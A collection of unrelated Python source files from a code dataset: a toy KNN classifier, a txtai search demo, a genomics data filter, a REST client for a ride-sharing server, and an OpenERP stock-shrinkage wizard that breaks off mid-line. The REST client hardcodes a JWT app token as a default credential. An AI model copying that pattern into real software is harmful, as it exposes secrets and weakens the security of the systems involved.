range(1,len(self.X_train)):\n\t\t\tdist = euc(self.X_train[i],row)\n\t\t\tif dist < best:\n\t\t\t\tbest = dist\n\t\t\t\tbest_index = i\n\t\treturn self.y_train[best_index]\n\n# Writing a classifier \n\n# import dataset\t\nfrom sklearn import datasets\niris = 
datasets.load_iris()\n\n# x is features, y is label\nX = iris.data\ny = iris.target\n\n# train_test_split now lives in model_selection (cross_validation was removed from sklearn)\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = .5)\n\n# Decision tree classifier\n#from sklearn import tree\n#my_classifier = tree.DecisionTreeClassifier()\n# KNeighbors Classifier\n#from sklearn.neighbors import KNeighborsClassifier\n#my_classifier = KNeighborsClassifier()\nmy_classifier = ScrappyKNN()\n\n\nmy_classifier.fit(X_train, y_train)\n\n\nfrom sklearn.metrics import accuracy_score\nfor i in range(3):\n\tpredictions = my_classifier.predict(X_test)\n\tprint(accuracy_score(y_test, predictions))\n","sub_path":"src/python/ml/5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} {"seq_id":"529707777","text":"\"\"\"\nDemo shell\n\"\"\"\n\nfrom cmd import Cmd\n\nfrom txtai.embeddings import Embeddings\n\n\nclass Shell(Cmd):\n \"\"\"\n Query shell.\n \"\"\"\n\n def __init__(self):\n super().__init__()\n\n self.intro = \"query shell\"\n self.prompt = \"(search) \"\n\n self.embeddings = None\n self.data = None\n\n def preloop(self):\n # Create embeddings model, backed by sentence-transformers & transformers\n self.embeddings = Embeddings({\"path\": \"sentence-transformers/nli-mpnet-base-v2\"})\n\n self.data = [\n \"US tops 5 million confirmed virus cases\",\n \"Canada's last fully intact ice shelf has suddenly collapsed, forming a Manhattan-sized iceberg\",\n \"Beijing mobilises invasion craft along coast as Taiwan tensions escalate\",\n \"The National Park Service warns against sacrificing slower friends in a bear attack\",\n \"Maine man wins $1M from $25 lottery ticket\",\n \"Make huge profits without work, earn up to $100,000 a day\",\n ]\n\n def default(self, line):\n # Get index of the section that best matches the query\n uid = self.embeddings.similarity(line, self.data)[0][0]\n print(self.data[uid])\n print()\n\n\ndef main():\n \"\"\"\n Shell execution loop.\n \"\"\"\n\n Shell().cmdloop()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"examples/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} {"seq_id":"453618282","text":"#!/usr/bin/python\n\n# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n\nimport sys, getopt, re, numpy\n\n#infile=\"/home/dwragg/Documents/eQTL/test.XPEHH\"\n#outfile=\"/home/dwragg/Documents/eQTL/test-filtered.XPEHH\"\n#rate=0.9\n\ndef main(argv):\n infile = ''\n outfile = ''\n rate = 0.9\n try:\n opts, args = getopt.getopt(argv,\"hi:o:r:\",[\"infile=\",\"outfile=\",\"rate=\"])\n except getopt.GetoptError:\n print('filterXPEHH.py -i <infile> -o <outfile> -r <rate>')\n sys.exit(2)\n for opt, arg in opts:\n if opt == '-h':\n print('filterXPEHH.py -i <infile> -o <outfile> -r <rate>')\n sys.exit()\n elif opt in (\"-i\", \"--infile\"):\n infile = arg\n elif opt in (\"-o\", \"--outfile\"):\n outfile = arg\n elif opt in (\"-r\", \"--rate\"):\n rate = float(arg)\n print('XPEHH file to read is', infile)\n print('XPEHH file to output is', outfile)\n print('Call rate is', rate)\n\n\n # Open files for writing and reading\n fout=open(outfile, \"w\")\n fin=open(infile)\n\n i = 0\n for line in fin:\n i = i + 1\n if(i==1):\n fout.write(line)\n else:\n # Calculate call rate\n call = 1 - ((len(re.findall(\"NA\", line))) / (len(line.rstrip(\"\\n\").split(\" \"))-1))\n if(call >= 
rate): \n # Set NA values to median\n data = line.split(\" \")\n xpehh = [ x for x in data[1:] if \"NA\" not in x ]\n xpehh_median = numpy.median(numpy.array(xpehh, dtype=float))\n updated = line.replace(\"NA\", str(xpehh_median))\n #fout.write(str(call) + \"\\t\" + updated)\n fout.write(updated)\n \n\n fin.close()\n fout.close()\n \n \n\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n \n \n \n","sub_path":"filterXPEHH.py","file_name":"filterXPEHH.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"331513157","text":"\"\"\"@package ServerRequest\nImplements API methods that allow user related\ntransactions and requests to be sent to the Shared\nServer.\n\"\"\"\nimport os\nimport json\nimport requests\nimport logging as logger\nimport config.constants as constants\nfrom src.main.resources.Server import ServerTokenUpdater\n\nSS_URI = \"http://127.0.0.1:5005/api\"\nif not \"SS_URL\" in os.environ:\n\tos.environ[\"SS_URL\"] = SS_URI\n\nDEFAULT_APP_TOKEN = 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwianRpIjoiZmNlNzljZWItOTIyYi00NTljLWE1OTQtNjZkZDAxMTQxNTU2IiwiZXhwIjoxNTEyMzY0MTY0LCJpYXQiOjE1MTE5MzI1MDR9.MDLKAxH-NAlErjDEigg-vr_8ijv-sJgQ1NhimMGtCPY'\n\nif not \"APP_TOKEN\" in os.environ:\n\tos.environ[\"APP_TOKEN\"] = DEFAULT_APP_TOKEN\n\nQUERY_TOKEN = \"?token=\"\nCARS_END = \"/cars\"\nUSER_END = os.environ[\"SS_URL\"] + \"/users\"\nTRANSACT_END = \"/transactions\"\nTRIPS_END = \"/trips\"\nSERVER_END = \"/server\"\nPAYMETHODS_END = \"/paymethods\"\n\nheaders = {'Content-Type' : 'application/json'}\nMAX_ATTEMPTS = 10\n\n\"\"\"Returns a list of all the users and their information in json format.\"\"\"\n@ServerTokenUpdater()\ndef getUsers():\n\tr = requests.get(USER_END + QUERY_TOKEN + os.environ[\"APP_TOKEN\"], headers=headers)\n\tif (r.status_code != constants.SUCCESS):\n\t\tlogger.getLogger(\"Shared Server returned error: %d\"%(r.status_code))\n\t\traise Exception(\"Shared Server returned error: %d\"%(r.status_code))\n\treturn (r.status_code, r.json()[\"users\"])\n\n\n\"\"\"Receives a user id. Returns the information of the user that matches that id in json format.\n\"\"\"\n@ServerTokenUpdater()\ndef getUser(userId):\n\tr = requests.get(USER_END + \"/\" + str(userId) + QUERY_TOKEN + os.environ[\"APP_TOKEN\"], headers=headers)\n\n\tif (r.status_code != constants.SUCCESS):\n\t\tlogger.getLogger(\"Shared Server returned error: %d\"%(r.status_code))\n\t\treturn (r.status_code, r.json())\n\treturn (r.status_code, r.json()[\"user\"])\n\n\n\"\"\"Attempts to perform a request. If the request is rejected because of a reference missmatch, the\noperation will be repeated until successfully completed or until a maximum number of attempts is\nreached or until another error arises.\"\"\"\ndef _permformUpdate(f, endpoint, updatedEntityName, updatedEntity):\n\tr = f(endpoint, updatedEntity)\n\tattempts = 0\n\twhile (r.status_code == constants.UPDATE_CONFLICT) and (attempts < MAX_ATTEMPTS):\n\t\tprint (\"UPDATE FAILED, RETRYING...\")\n\t\tnewData = json.loads(requests.get(endpoint, headers=headers).text)\n\t\tupdatedEntity[\"_ref\"] = newData[updatedEntityName][\"_ref\"]\n\t\tr = f(endpoint, updatedEntity)\n\t\tattempts += 1\n\tif (r.status_code == constants.UPDATE_CONFLICT):\n\t\tlogger.getLogger().error(\"Attempted to update user. Request failed with reference error.\")\n\t\traise ValueError(\"Error attempting to update entity. 
Try again later.\")\n\treturn r\n\n\"\"\"Receives a user represented by a json structure and attempts to update its data.\nReturns False if the user id does not match any user id or _ref value is invalid.\nReturns True if the user info was successfully updated.\"\"\"\ndef updateUser(user_js):\n\tendpoint = USER_END + \"/\" + str(user_js[\"_id\"]) + QUERY_TOKEN + os.environ[\"APP_TOKEN\"]\n\tr = _permformUpdate(lambda ep, u: requests.put(ep, json.dumps(u), headers=headers), endpoint, \"user\", user_js)\n\tif (r.status_code == constants.NOT_FOUND):\n\t\treturn (False, r.json()['message'])\n\tif (r.status_code != constants.SUCCESS):\n\t\traise Exception(\"Shared Server returned error: %d\"%(r.status_code))\n\treturn (True, r.json()['user'])\n\n\"\"\" Asks shared server to create a new user\"\"\"\n@ServerTokenUpdater()\ndef createUser(user_js):\n\tr = requests.post(USER_END + QUERY_TOKEN + os.environ[\"APP_TOKEN\"], data = json.dumps(user_js), headers=headers)\n\tif (r.status_code != constants.CREATE_SUCCESS):\n\t\tlogger.getLogger(\"Shared Server returned error: %d\"%(r.status_code))\n\t\treturn (r.status_code, r.json())\n\treturn (r.status_code, r.json()[\"user\"])\n\n\"\"\"Receives a user represented by a json structure and validates its credentials.\nReturns True if the credentials were invalid, returns False otherwise.\n\"\"\"\ndef validateUser(user_js):\n\tr = requests.post(USER_END + \"/validate\" + QUERY_TOKEN + os.environ[\"APP_TOKEN\"], data = json.dumps(user_js), headers=headers)\n\tif (r.status_code == constants.UNAUTHORIZED):\n\t\tServerTokenUpdater().updateToken()\n\t\tr = requests.post(USER_END + \"/validate\" + QUERY_TOKEN + os.environ[\"APP_TOKEN\"], data = json.dumps(user_js), headers=headers)\n\tif (r.status_code != constants.SUCCESS):\n\t\tlogger.getLogger(\"Shared Server returned error: %d\"%(r.status_code))\n\t\treturn (False, r)\n\treturn (True, r.json()['user'])\n\n\"\"\"Receives a user id and attempts to delete it. Returns True if the user exists and is correctly deleted.\nReturns False if the user id does not match any user id.\n\"\"\"\ndef deleteUser(userId):\n\tr = requests.delete(USER_END + \"/\" + str(userId) + QUERY_TOKEN + os.environ[\"APP_TOKEN\"], headers=headers)\n\tif (r.status_code == constants.UNAUTHORIZED):\n\t\tServerTokenUpdater().updateToken()\n\t\tr = requests.delete(USER_END + \"/\" + str(userId) + QUERY_TOKEN + os.environ[\"APP_TOKEN\"], headers=headers)\n\tif (r.status_code != constants.DELETE_SUCCESS):\n\t\tlogger.getLogger(\"Shared Server returned error: %d\"%(r.status_code))\n\t\treturn (False, r.status_code)\n\treturn (True, r.status_code)\n\n\"\"\"Receives a user id and returns a list of all the cars owned by that user.\n\"\"\"\n@ServerTokenUpdater()\ndef getUserCars(userId):\n\tr = requests.get(USER_END + \"/\" + str(userId) + CARS_END)\n\tif (r.status_code != constants.SUCCESS):\n\t\tlogger.getLogger(\"Shared Server returned error: %d\"%(r.status_code))\n\t\traise Exception(\"Shared Server returned error: %d\"%(r.status_code))\n\treturn (r.status_code, r.json()[\"cars\"])\n\n\"\"\"Receives a user id and a car id. 
Returns the information of the car with\nmatching id that belongs to the identified user.\n\"\"\"\n@ServerTokenUpdater()\ndef getUserCar(userId, carId):\n\tr = requests.get(USER_END + \"/\" + str(userId) + CARS_END + \"/\" + str(carId) + QUERY_TOKEN + os.environ[\"APP_TOKEN\"], headers=headers)\n\tif (r.status_code != constants.SUCCESS):\n\t\tlogger.getLogger(\"Shared Server returned error: %d\"%(r.status_code))\n\t\treturn (r.status_code, r.json())\n\treturn (r.status_code, r.json()[\"car\"])\n\n\"\"\" Receives a user id, a car owner and a dictionary containing the properties of the car\nwith the following layout:\n{\n 'name': 'brandName',\n 'value': 'plateNumber'\n}\nAttempts to create a new car with the information given.\nReturns a car object on successful creation.\n\"\"\"\n@ServerTokenUpdater()\ndef createUserCar(userId, carProperties):\n\tcarInfo = { \"id\" : \"1\" }\n\tcarInfo[\"_ref\"] = \"1\"\n\tcarInfo[\"owner\"] = \"FIUBER\"\n\tcarInfo[\"properties\"] = [carProperties]\n\tr = requests.post(USER_END + \"/\" + str(userId) + CARS_END + QUERY_TOKEN + os.environ[\"APP_TOKEN\"], data = json.dumps(carInfo), headers=headers)\n\tif (r.status_code != constants.CREATE_SUCCESS):\n\t\tlogger.getLogger(\"Shared Server returned error: %d\"%(r.status_code))\n\t\treturn (r.status_code, r.json())\n\treturn (r.status_code, r.json()[\"car\"])\n\n\"\"\"Receives a user id and attempts to delete it. Returns True if the user exists and is correctly deleted.\nReturns False if the user id does not match any user id.\n\"\"\"\n@ServerTokenUpdater()\ndef deleteUserCar(userId, carId):\n\tr = requests.delete(USER_END + \"/\" + str(userId) + CARS_END + \"/\" + str(carId) + QUERY_TOKEN + os.environ[\"APP_TOKEN\"])\n\tif (r.status_code == constants.NOT_FOUND):\n\t\treturn (False, r.status_code)\n\tif (r.status_code != constants.DELETE_SUCCESS):\n\t\tlogger.getLogger(\"Shared Server returned error: %d\"%(r.status_code))\n\t\traise Exception(\"Shared Server returned error: %d\"%(r.status_code))\n\treturn (True, r.status_code)\n\n\n\"\"\"Receives a user id number, a car id number and a car represented by a json structure with the following layout:\n\t{\n\t \"id\": \"string\",\n\t \"_ref\": \"string\",\n\t \"owner\": \"string\",\n\t \"properties\": [\n\t {\n\t \"name\": \"string\",\n\t \"value\": \"string\"\n\t }\n\t ]\n\t}\nReturns False if the user and car ids do not match any existing vehicles.\nReturns True if the car info was successfully updated.\"\"\"\ndef updateUserCar(userId, carId, car):\n\tendpoint = USER_END + \"/\" + str(userId) + CARS_END + \"/\" + str(carId) + QUERY_TOKEN + os.environ[\"APP_TOKEN\"]\n\tr = _permformUpdate(lambda ep, u: requests.put(ep, json.dumps(u), headers=headers), endpoint, \"car\", car)\n\tif (r.status_code == constants.NOT_FOUND):\n\t\treturn (False, r.json()['message'])\n\tif (r.status_code != constants.SUCCESS):\n\t\tlogger.getLogger(\"Shared Server returned error: %d\"%(r.status_code))\n\t\treturn (r.status_code, r.json())\n\treturn (True, r.json()['car'])\n\n\n\"\"\"Receives a user id and returns a list with all the transactions made by that user.\n\"\"\"\n@ServerTokenUpdater()\ndef getUserTransactions(id):\n\tendpoint = USER_END + \"/\" + str(id) + TRANSACT_END + QUERY_TOKEN + os.environ[\"APP_TOKEN\"]\n\tr = requests.get(endpoint, headers=headers)\n\tif (r.status_code != constants.SUCCESS):\n\t\tlogger.getLogger(\"Shared Server returned error: %d\"%(r.status_code))\n\t\treturn (r.status_code, r.json())\n\treturn (r.status_code, 
r.json()['transactions'])\n\n\n\"\"\"Receives a user id and a json representing a transaction with the following layout:\n\t {\n\t \"trip\": \"string\",\n\t \"timestamp\": 0,\n\t \"cost\": {\n\t \"currency\": \"string\",\n\t \"value\": 0\n\t },\n\t \"description\": \"string\",\n\t \"data\": {}\n\t }\nReturns a tuple (True, transaction) if the transaction was successfully created.\n\"\"\"\n@ServerTokenUpdater()\ndef makePayment(id, transaction):\n\tendpoint = USER_END + \"/\" + str(id) + TRANSACT_END + QUERY_TOKEN + os.environ[\"APP_TOKEN\"]\n\ttransaction[\"id\"] = \"1\"\n\tr = requests.put(endpoint, data = json.dumps(transaction), headers=headers)\n\tif (r.status_code != constants.SUCCESS):\n\t\tlogger.getLogger(\"Shared Server returned error: %d\"%(r.status_code))\n\t\treturn (r.status_code, r.json())\n\treturn (r.status_code, r.json()[\"transaction\"])\n\n\"\"\"Receives a user id. Returns a json structures with the following layout:\n \"trips\": [\n {\n \"id\": \"string\",\n \"applicationOwner\": \"owner name\",\n \"driver\": \"driver id\",\n \"passenger\": \"passanger id\",\n \"start\": {\n \"address\": {\n \"street\": \"street name\",\n \"location\": {\n \"lat\": 0,\n \"lon\": 0\n }\n },\n \"timestamp\": 0\n },\n \"end\": {\n \"address\": {\n \"street\": \"street name\",\n \"location\": {\n \"lat\": 0,\n \"lon\": 0\n }\n },\n \"timestamp\": 0\n },\n \"totalTime\": 0,\n \"waitTime\": 0,\n \"travelTime\": 0,\n \"distance\": 0,\n \"route\": [\n {\n \"location\": {\n \"lat\": 0,\n \"lon\": 0\n },\n \"timestamp\": 0\n }\n ],\n \"cost\": {\n \"currency\": \"coin\",\n \"value\": 0\n }\n }\n ]\n\"\"\"\n@ServerTokenUpdater()\ndef getUserTrips(id):\n\tendpoint = USER_END + \"/\" + str(id) + TRIPS_END + QUERY_TOKEN + os.environ[\"APP_TOKEN\"]\n\tr = requests.get(endpoint, headers=headers)\n\tif (r.status_code != constants.SUCCESS):\n\t\tlogger.getLogger(\"Shared Server returned error: %d\"%(r.status_code))\n\t\treturn (r.status_code, r.json())\n\treturn (r.status_code, r.json()['trips'])\n\n\"\"\"Receives a trip id. 
Returns a json structure with the following layout:\n{\n \"id\": \"string\",\n \"applicationOwner\": \"string\",\n \"driver\": \"string\",\n \"passenger\": \"string\",\n \"start\": {\n \"address\": {\n \"street\": \"string\",\n \"location\": {\n \"lat\": 0,\n \"lon\": 0\n }\n },\n \"timestamp\": 0\n },\n \"end\": {\n \"address\": {\n \"street\": \"string\",\n \"location\": {\n \"lat\": 0,\n \"lon\": 0\n }\n },\n \"timestamp\": 0\n },\n \"totalTime\": 0,\n \"waitTime\": 0,\n \"travelTime\": 0,\n \"distance\": 0,\n \"route\": [\n {\n \"location\": {\n \"lat\": 0,\n \"lon\": 0\n },\n \"timestamp\": 0\n }\n ],\n \"cost\": {\n \"currency\": \"string\",\n \"value\": 0\n }\n}\n\"\"\"\n@ServerTokenUpdater()\ndef getTrip(id):\n\tendpoint = os.environ[\"SS_URL\"] + TRIPS_END + \"/\" + str(id) + QUERY_TOKEN + os.environ[\"APP_TOKEN\"]\n\tr = requests.get(endpoint, headers=headers)\n\tif (r.status_code != constants.SUCCESS):\n\t\tlogger.getLogger(\"Shared Server returned error: %d\"%(r.status_code))\n\t\treturn (r.status_code, r.json())\n\treturn (r.status_code, r.json()['trip'])\n\n\n\"\"\"Receives a json structure representing a trip, with the following layout:\n \"trip\": {\n \"id\": \"string\",\n \"applicationOwner\": \"string\",\n \"driver\": \"string\",\n \"passenger\": \"string\",\n \"start\": {\n \"address\": {\n \"street\": \"string\",\n \"location\": {\n \"lat\": 0,\n \"lon\": 0\n }\n },\n \"timestamp\": 0\n },\n \"end\": {\n \"address\": {\n \"street\": \"string\",\n \"location\": {\n \"lat\": 0,\n \"lon\": 0\n }\n },\n \"timestamp\": 0\n },\n \"totalTime\": 0,\n \"waitTime\": 0,\n \"travelTime\": 0,\n \"distance\": 0,\n \"route\": [\n {\n \"location\": {\n \"lat\": 0,\n \"lon\": 0\n },\n \"timestamp\": 0\n }\n ],\n \"cost\": {\n \"currency\": \"string\",\n \"value\": 0\n }\n },\n \"paymethod\": {\n \"paymethod\": \"string\",\n \"parameters\": {}\n }\n\nReturns a tuple (201, trip) if the trip was successfully created.\n\"\"\"\n@ServerTokenUpdater()\ndef createTrip(trip):\n\tr = requests.post(os.environ[\"SS_URL\"] + TRIPS_END + QUERY_TOKEN + os.environ[\"APP_TOKEN\"], data = json.dumps(trip), headers=headers)\n\tif (r.status_code != constants.CREATE_SUCCESS):\n\t\tlogger.getLogger(\"Shared Server returned error: %d\"%(r.status_code))\n\treturn (r.status_code, r.json())\n\n\"\"\"Receives a json structure containing all the trip data, with the following layout:\n{\n \"id\": \"string\",\n \"applicationOwner\": \"string\",\n \"driver\": \"string\",\n \"passenger\": \"string\",\n \"start\": {\n \"address\": {\n \"street\": \"string\",\n \"location\": {\n \"lat\": 0,\n \"lon\": 0\n }\n },\n \"timestamp\": 0\n },\n \"end\": {\n \"address\": {\n \"street\": \"string\",\n \"location\": {\n \"lat\": 0,\n \"lon\": 0\n }\n },\n \"timestamp\": 0\n },\n \"totalTime\": 0,\n \"waitTime\": 0,\n \"travelTime\": 0,\n \"distance\": 0,\n \"route\": [\n {\n \"location\": {\n \"lat\": 0,\n \"lon\": 0\n },\n \"timestamp\": 0\n }\n ],\n \"cost\": {\n \"currency\": \"string\",\n \"value\": 0\n }\n}\nReturns trip cost estimation:\n {\n \"currency\": \"string\",\n \"value\": 0\n }\n\"\"\"\n@ServerTokenUpdater()\ndef estimateTrip(tripData):\n\tr = requests.post(os.environ[\"SS_URL\"] + TRIPS_END + \"/estimate\" + QUERY_TOKEN + os.environ[\"APP_TOKEN\"], data = json.dumps(tripData), headers=headers)\n\tif (r.status_code != constants.CREATE_SUCCESS):\n\t\tlogger.getLogger(\"Shared Server returned error: %d\"%(r.status_code))\n\treturn (r.status_code, r.json())\n\n\n\"\"\"Returns a list containing all paymethods, such as 
the following:\n [\n {\n \"name\": \"paymethodName\",\n \"parameters\": {\"number\": \"112233\", \"type\": \"credit\", \"expirationMonth\": \"01\", \"expirationYear\": \"19\", \"ccvv\": \"225\"}\n }\n ]\n\"\"\"\n@ServerTokenUpdater()\ndef getPaymethods():\n\tr = requests.get(os.environ[\"SS_URL\"] + PAYMETHODS_END + QUERY_TOKEN + os.environ[\"APP_TOKEN\"], headers=headers)\n\tprint(r)\n\tif (r.status_code != constants.CREATE_SUCCESS):\n\t\tlogger.getLogger(\"Shared Server returned error: %d\"%(r.status_code))\n\t\treturn (r.status_code, r.json())\n\treturn (r.status_code, r.json()[\"paymethods\"])\n\n\n\n\n","sub_path":"src/main/com/ServerRequest.py","file_name":"ServerRequest.py","file_ext":"py","file_size_in_byte":15277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"286167672","text":"# coding: utf-8\n\n#########################################################################################################################\n# @version : 1.0 #\n# @autor : Alicia Romero #\n# @creacion : 2015-11-04 (aaaa/mm/dd) #\n# @linea : Máximo, 121 caracteres #\n# @descripcion: Wizard para captura de producto por tienda #\n#########################################################################################################################\n\n#Importando las clases necesarias\nfrom osv import fields, osv\nimport time\nimport datetime\nimport pooler\nfrom openerp.tools.translate import _\n\n#Modelo : Registro de Producto\nclass merma_wizard_productos(osv.TransientModel):\n \n _description = 'Wizard Productos'\n \n ### //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// ###\n ### ###\n ### METODOS ###\n ### ###\n ### //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// ###\n def guardarProducto(self, cr, uid, ids, cantidad_mover=0.0, context = { }):\n \"\"\"\n Función del Botón objeto \"guardarProducto\" con etiqueta \"Guardar\" \n para almacenar los datos en la tabla 'merma_seleccion' modelo 'Lista de Merma'\n * Para OpenERP [button]\n * Argumentos OpenERP: [cr, uid, ids, context]\t\t\t\n @return dict\n \"\"\"\n #objeto\n datos=self.pool.get( self._name ).browse( cr, uid, ids[0] )\n cantidad_mover=datos.cantidad_mover\n valida=cantidad_mover\n if valida > 0 :\n producto=datos.producto\n clave=datos.clave_ide\n cod_ean13=datos.cod_ean13\n id_producto=datos.producto_m2o_id.id\n tienda=datos.almacen_m2o_id.id\n destino_id=datos.destino_mov_m2o_id.id\n localizacion_id=datos.localizacion_m2o_id.id\n cantidad_mover=datos.cantidad_mover\n cantidad_prod=datos.cantidad_prod\n unidad_med=datos.unidad_med\n unidad_med_id=datos.medida_m2o_id.id\n precio=datos.precio\n empleado_autor=datos.empleado_autor\n autor_uid=uid\n nombre_destino=datos.destino_mov_m2o_id.name\n name_move=producto+\" \"+ nombre_destino\n clave_sep = nombre_destino.split()\n nombre_destino = clave_sep[1].lower()\n estado=\"espera\"\n #se guarda id de wizard\n ide_wizard = ids[0]\n #creo fechas\n fecha_x = datetime.datetime.now()\n fecha_mov_stock = time.strftime(\"%y%m%d\")\n resul=cantidad_prod - cantidad_mover\n\n if resul >= 0:\n #Valores a insertar\n valores = (\n autor_uid, fecha_x, ide_wizard, clave, fecha_mov_stock, empleado_autor, name_move, cod_ean13, producto, cantidad_mover, \n unidad_med, unidad_med_id, precio, autor_uid, localizacion_id, destino_id, id_producto, tienda, nombre_destino, estado,\n 
cantidad_prod,\n )\n # print valores\n this = self.browse(cr, uid, ids)[0]\n self.write(cr, uid, ids, {\n 'cod_ean13':'',\n 'cod_ubicacion':'',\n 'state': 'producto',\n \n }, context=context)\n #se insertan los nuevos datos a la tabla listado_codigo\n cr.execute(\n \"\"\"\n INSERT INTO merma_seleccion\n (create_uid, create_date, ide_wizard, clave_ide, fecha_creacion, name_login, name_move, ean13, producto, cantidad, unidad_med, \n product_m2o_med_id, precio_prod, usuario_m2o_id, location_id, destino_id, producto_s_m2o_id, almacen_m2o_id, nombre_destino,\n estado, cantidad_ubica )\n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\n \"\"\", valores )\n \n return {\n 'type': 'ir.actions.act_window',\n 'view_type': 'form',\n 'view_mode': 'form',\n 'res_id': this.id,\n 'views': [(False, 'form')],\n 'res_model': 'merma_wizard_productos',\n 'target': 'new',\n }\n else:\n this = self.browse(cr, uid, ids)[0]\n return {\n 'type': 'ir.actions.act_window',\n 'view_type': 'form',\n 'view_mode': 'form',\n 'res_id': this.id,\n 'views': [(False, 'form')],\n 'res_model': 'merma_wizard_productos',\n 'target': 'new',\n } \n else :\n this = self.browse(cr, uid, ids)[0]\n return {\n 'type': 'ir.actions.act_window',\n 'view_type': 'form',\n 'view_mode': 'form',\n 'res_id': this.id,\n 'views': [(False, 'form')],\n 'res_model': 'merma_wizard_productos',\n 'target': 'new',\n }\n\n #---------------------------------------------------------------------------------------------------------------------------------------------------\n def obtenerProducto(self, cr, uid, ids, cod_ean13, cod_ubicacion='0' ):\n \"\"\"\n Función del Botón objeto objeto \"obtenerProducto\" con etiqueta \"Buscar\" y y Evento onchange de los campos \"cod_ean13\" y \"cod_ubicacion\"\n para obtener y actualizar los datos del producto\n * Para OpenERP [button]\n * Para OpenERP [onchange]\n * Argumentos OpenERP: [cr, uid, ids, cod_ean13, cod_ubicacion]\t\t\t\n @param cod_ean13: (char) Codigo del producto\n @param cod_ubicacion: (char) Codigo de la ubicacion de la tienda\n @return dict\n \"\"\"\n context =''\n\n datos=self.pool.get( self._name ).browse( cr, uid, ids[0] )\n if cod_ean13 != False and cod_ubicacion != False:\n #declaro id de localizacion\n id_locali=0\n #valida codigos no sean False\n if cod_ean13 :\n cod_ean13 = cod_ean13\n else:\n cod_ean13 = datos.cod_ean13\n if cod_ubicacion:\n cod_ubicacion = cod_ubicacion\n else:\n cod_ubicacion = datos.cod_ubicacion\n #obtener valores \n tienda=datos.almacen_m2o_id.id\n destino=datos.destino_mov_m2o_id.id\n muestra_dest=datos.destino_mov_m2o_id.complete_name\n ide_wizard = ids[0]\n existe = False\n #valida codigo no sea vacio\n if len(cod_ean13) >= 10:\n #valida que el codigo sea digitos y sean 13\n if len(cod_ean13) == 13 and cod_ean13.isdigit() == True:\n fecha = time.strftime(\"%y%m%d\")\n cr.execute(\n \"\"\"\n SELECT\n ean13\n FROM merma_seleccion\n WHERE fecha_creacion = %s\n AND ean13 =%s\n AND create_uid =%s\n \"\"\",(fecha, cod_ean13, uid ))\n registro_consultado = cr.fetchall()\n # print registro_consultado\n existe = (False) if (registro_consultado == [] or registro_consultado == None ) else ( ( True ) )\n # print existe\n if existe == False:\n #consulta obtener datos del producto apartir del codigo\n cr.execute(\n \"\"\"\n SELECT p.name_template,\n p.image_small,\n p.id,\n pt.list_price AS precio,\n pu.name AS medida,\n pt.uom_id\n FROM product_product p\n INNER JOIN product_template pt\n ON p.product_tmpl_id=pt.id\n INNER JOIN product_uom 
pu\n ON pt.uom_id=pu.id\n WHERE p.active=True\n AND\n ean13 =%s\n order by p.id desc\n limit 1\n \"\"\",(cod_ean13,))\n producto = cr.fetchall()\n # valida producto exista\n if producto != None and type( producto ) in ( list, tuple, dict ) and producto != [] :\n producto = producto[0]\n id_producto=producto[2]\n #valida que el codigo sea digitos y sean 13\n if len(cod_ubicacion) == 13 and cod_ubicacion.isdigit() == True:\n #consulta para obtener id de la ubicacion apartir del codigo\n cr.execute(\n \"\"\"\n SELECT id\n FROM stock_location\n WHERE active=True and\n x_ean13_location_correct = %s\n \"\"\",(cod_ubicacion,))\n ubica = cr.fetchall()\n \n if ubica != None and type( ubica ) in ( list, tuple, dict ) and ubica != [] :\n ubica = ubica[0]\n #Variable con el id de la ubicacion\n id_locali= ubica[0]\n #objeto de stock_location \"Ubicaciones\"\n location_pool = self.pool.get('stock.location')\n #nombre completo de la ubicacion para mostrar\n muestra_local = location_pool.browse(cr, uid, id_locali, context=context).complete_name\n #consulta para obtener el id de la \"ubicacion de exitencias\" de la tienda y obtener los hijos de esta para\n #comparar y validar que el \"codigo de ubicacion\" del producto pertenesca a la tienda seleccionada.\n cr.execute(\n \"\"\"\n SELECT\n s.lot_stock_id\n from stock_warehouse s \n INNER JOIN stock_location se\n ON s.lot_stock_id = se.id\n WHERE s.id= %s\n \"\"\",(tienda,))\n id_ubic_exist_tienda=cr.fetchone()\n #toma el valor del id de la ubicacion\n id_ubic_exist_tienda=id_ubic_exist_tienda[0]\n #Se obtienen los hijos apartir de la ubicacion padre\n local_hijos_tienda = location_pool.search(cr, uid, [('location_id', 'child_of', [id_ubic_exist_tienda])], context=context)\n #Se declara variable\n pertenece_ubicacion=False\n #recorre lista de ubicaciones de la tienda \"local_hijos_tienda\" y si encuentra que uno de los id coincide con el id de la\n # ubicacion cambia la variable de pertenece_ubicacion a true.\n for id_ubica in local_hijos_tienda:\n if id_ubica == id_locali:\n pertenece_ubicacion=True\n #Valida que la ubicacion pertenesca a la tienda\n if pertenece_ubicacion == True:\n #Consulta para validar que exista el producto en la ubicacion\n cr.execute(\n \"\"\"\n SELECT location_id, product_id, trunc(qty, 3) \n FROM stock_report_prodlots \n WHERE location_id = %s and qty >0\n AND product_id = %s\n \"\"\",(id_locali, id_producto))\n existe_producto = cr.fetchall()\n if existe_producto != None and type(existe_producto) in ( list, tuple, dict ) and existe_producto != [] :\n existe_producto = existe_producto[0]\n cantidad_en_ubicacion= existe_producto[2]\n #se crea clave\n ide_wizard = ids[0]\n datos=self.pool.get( self._name ).browse( cr, uid, ids[0] )\n clave_destino=str(datos.destino_mov_m2o_id.name)\n clave_sep = clave_destino.split()\n clave_sepa = clave_sep[1]\n clave = clave_sep[0].upper()+clave_sepa[:3].upper() + 